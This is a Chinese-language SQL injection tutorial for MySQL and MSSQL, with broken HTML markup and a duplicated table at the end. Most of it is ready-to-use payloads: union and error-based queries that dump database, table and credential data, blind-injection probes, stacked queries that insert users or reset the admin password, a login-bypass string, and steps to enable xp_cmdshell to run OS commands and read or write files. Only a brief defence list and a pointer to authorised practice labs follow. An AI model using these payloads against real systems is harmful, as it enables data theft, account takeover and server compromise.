MySQL与MSSQL注入技术详解<\/h1>

一、MySQL注入技术<\/h2>

1. 联合注入(Union Injection)<\/h3>

原理<\/strong>：通过UNION关键字将恶意SQL语句与原始查询合并执行<\/p>

步骤<\/strong>：<\/p>

判断注入点<\/strong>：<\/p>

数字型：id=1 and 1=1<\/code>(正常) vs id=1 and 1=2<\/code>(异常)<\/li>
字符型：构造闭合' -- s<\/code>并测试and 1=1<\/code>与and 1=2<\/code><\/li> <\/ul> <\/li>
判断字段数量<\/strong>：<\/p> order by n<\/code>递增测试直到报错<\/li> <\/ul> <\/li> 确定回显位置<\/strong>：<\/p> union select 1,2,3...<\/code>观察哪些数字显示在页面上<\/li> <\/ul> <\/li> 爆数据<\/strong>：<\/p> 基本信息：user()<\/code>, database()<\/code>, version()<\/code><\/li> 爆库：union select 1,2,group_concat(schema_name) from information_schema.schemata<\/code><\/li> 爆表：union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()<\/code><\/li> 爆字段：union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"<\/code><\/li> 爆数据：union select 1,group_concat(username),group_concat(password) from users<\/code><\/li> <\/ul> <\/li> <\/ol> 2. 报错注入(Error-based Injection)<\/h3> 适用场景<\/strong>：后台未处理数据库报错信息，将错误返回前台<\/p> 常用函数<\/strong>：<\/p> extractvalue()<\/code><\/li> updatexml()<\/code><\/li> floor()<\/code><\/li> <\/ul> 示例<\/strong>：<\/p> 获取数据库：or extractvalue('1',concat("~~",(database()))) -- s<\/code><\/li> 获取表：or extractvalue('1',concat("~~",(select group_concat(table_name) from information_schema.tables where table_schema=database()))) -- s<\/code><\/li> 获取字段：or extractvalue('1',concat("~~",(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"))) -- s<\/code><\/li> <\/ul> 3. 盲注(Blind Injection)<\/h3> 布尔盲注<\/h4> 原理<\/strong>：通过页面返回的真\/假状态判断信息<\/p> 常用函数<\/strong>：<\/p> length()<\/code>：判断长度<\/li> substr()<\/code>：截取字符<\/li> ascii()<\/code>：获取ASCII码<\/li> if()<\/code>：条件判断<\/li> <\/ul> 步骤<\/strong>：<\/p> 判断数据库长度：and length(database())>n<\/code><\/li> 逐字符判断库名：and ascii(substr(database(),1,1))=x<\/code><\/li> 判断表数量及名称<\/li> 判断字段及数据<\/li> <\/ol> 时间盲注<\/h4> 原理<\/strong>：通过响应延迟判断条件真假<\/p> 关键函数<\/strong>：sleep()<\/code>, if()<\/code><\/p> 示例<\/strong>：<\/p> and if(ascii(substr(database(),1,1))=115,sleep(5),1)<\/code><\/li> <\/ul> 4. 宽字节注入<\/h3> 原理<\/strong>：利用GBK编码特性吃掉转义符(\)<\/p> 步骤<\/strong>：<\/p> 构造宽字节：%df'<\/code> → 与转义符\<\/code>(%5c)组合成汉字<\/li> 后续步骤同普通注入<\/li> <\/ol> 5. 二次注入<\/h3> 原理<\/strong>：<\/p> 首次插入恶意数据(如admin' -- s<\/code>)<\/li> 后端转义存储为admin\' -- s<\/code><\/li> 数据库存储时去除转义符恢复为admin' -- s<\/code><\/li> 二次调用时执行恶意SQL<\/li> <\/ol> 6. 堆叠注入(Stacked Queries)<\/h3> 原理<\/strong>：利用分号执行多条SQL语句<\/p> 示例<\/strong>：<\/p> 1';insert into users values(666,'zgao','zgao') --+<\/code><\/li> 1';update users set password='123456' where username='admin' -- s<\/code><\/li> <\/ul> 7. POST注入<\/h3> 特点<\/strong>：注入点位于POST请求中，方法与GET注入类似<\/p> 万能密码<\/strong>：xxx' or 1=1 #<\/code><\/p> 二、MSSQL注入技术<\/h2> 1. 基本知识<\/h3> 系统表<\/strong>：<\/p> master..sysdatabases<\/code>：所有数据库<\/li> sysobjects<\/code>：当前数据库所有对象(xtype='U'为用户表)<\/li> syscolumns<\/code>：当前数据库所有列<\/li> <\/ul> 常用函数<\/strong>：<\/p> db_name()<\/code>：当前数据库名<\/li> @@version<\/code>：版本信息<\/li> host_name()<\/code>：主机名<\/li> is_srvrolemember('sysadmin')<\/code>：判断服务器角色<\/li> is_member('db_owner')<\/code>：判断数据库角色<\/li> <\/ul> 2. 联合注入<\/h3> 步骤<\/strong>：<\/p> 判断注入点：and 1=1<\/code> vs and 1=2<\/code><\/li> 判断字段数：order by n<\/code><\/li> 联合查询：union select 1,2,3<\/code><\/li> 爆数据：库名：union select 1,db_name(),@@version<\/code><\/li> 表名：union select 1,2,name from 库名..sysobjects where xtype='U'<\/code><\/li> 列名：union select 1,2,col_name(object_id('users'),1) from sysobjects<\/code><\/li> <\/ul> <\/li> <\/ol> 3. 报错注入<\/h3> 常用函数<\/strong>：<\/p> convert()<\/code><\/li> cast()<\/code><\/li> db_name()<\/code><\/li> file_name()<\/code><\/li> <\/ul> 示例<\/strong>：<\/p> and 1=convert(int,@@version)<\/code><\/li> and 1=convert(int,(select top 1 name from 库名.sys.sysobjects where xtype='U'))<\/code><\/li> <\/ul> 4. 盲注<\/h3> 布尔盲注<\/h4> and len((select db_name()))=4<\/code><\/li> and ascii(substring((select db_name()),1,1))=78<\/code><\/li> <\/ul> 时间盲注<\/h4> WAITFOR DELAY '0:0:5'<\/code><\/li> if (ascii(substring((select db_name()),1,1))=78) WAITFOR DELAY '0:0:4'<\/code><\/li> <\/ul> 5. 进阶技术<\/h3> 判断站库分离<\/strong>： and ((select host_name()) = (select @@SERVERNAME))<\/code><\/p> XP_CMDSHELL使用<\/strong>：<\/p> 判断是否开启： and (select count(*) from master..sysobjects where xtype='x' and name='xp_cmdshel')<\/code><\/li> 开启命令： EXEC<\/span> sp_configure 'show advanced options'<\/span>,1<\/span>; <\/span><\/span>RECONFIGURE; <\/span><\/span>EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>,1<\/span>; <\/span><\/span>RECONFIGURE; <\/span><\/span><\/code><\/pre><\/li> 执行系统命令： exec xp_cmdshell 'whoami'<\/code><\/li> <\/ol> 文件操作<\/strong>：<\/p> 写入文件：exec xp_cmdshell 'whoami > C:\/temp.txt'<\/code><\/li> 读取文件： create<\/span> table<\/span> temp(res varchar(8000<\/span>)); <\/span><\/span>bulk insert<\/span> master.dbo.temp from<\/span> 'C:\/temp.txt'<\/span>; <\/span><\/span>select<\/span> *<\/span> from<\/span> master.dbo.temp; <\/span><\/span>drop<\/span> table<\/span> temp; <\/span><\/span><\/code><\/pre><\/li> <\/ul> 三、防御措施<\/h2> 严格过滤用户输入<\/li> 使用参数化查询(预编译语句)<\/li> 最小权限原则<\/li> 关闭错误回显<\/li> 使用WAF<\/li> 定期代码审计与更新<\/li> <\/ol> 四、关键区别<\/h2> 特性<\/th> MySQL<\/th> MSSQL<\/th> <\/tr> <\/thead> 系统表<\/td> information_schema<\/td> sysobjects, syscolumns<\/td> <\/tr> 注释符<\/td> #<\/code>, -- <\/code>, \/* *\/<\/code><\/td> --<\/code>, \/* *\/<\/code><\/td> <\/tr> 连接字符串<\/td> concat()<\/code><\/td> +<\/code><\/td> <\/tr> 延时函数<\/td> sleep()<\/code><\/td> WAITFOR DELAY<\/code><\/td> <\/tr> 系统命令<\/td> 需特定条件<\/td> xp_cmdshell<\/code><\/td> <\/tr> 默认数据库<\/td> information_schema<\/td> master<\/td> <\/tr> <\/tbody> <\/table> 掌握这些技术需要结合实战练习，建议在合法授权环境下使用DVWA、SQLi-Labs等平台进行测试。<\/p>

特性<\/th>	MySQL<\/th>	MSSQL<\/th> <\/tr> <\/thead>
系统表<\/td>	information_schema<\/td>	sysobjects, syscolumns<\/td> <\/tr>
注释符<\/td>	`#<\/code>, -- <\/code>, \/* *\/<\/code><\/td>`	`--<\/code>, \/* *\/<\/code><\/td> <\/tr>`
连接字符串<\/td>	`concat()<\/code><\/td>`	`+<\/code><\/td> <\/tr>`
延时函数<\/td>	`sleep()<\/code><\/td>`	`WAITFOR DELAY<\/code><\/td> <\/tr>`
系统命令<\/td>	需特定条件<\/td>	`xp_cmdshell<\/code><\/td> <\/tr>`
默认数据库<\/td>	information_schema<\/td>	master<\/td> <\/tr> <\/tbody> <\/table> 掌握这些技术需要结合实战练习，建议在合法授权环境下使用DVWA、SQLi-Labs等平台进行测试。<\/p>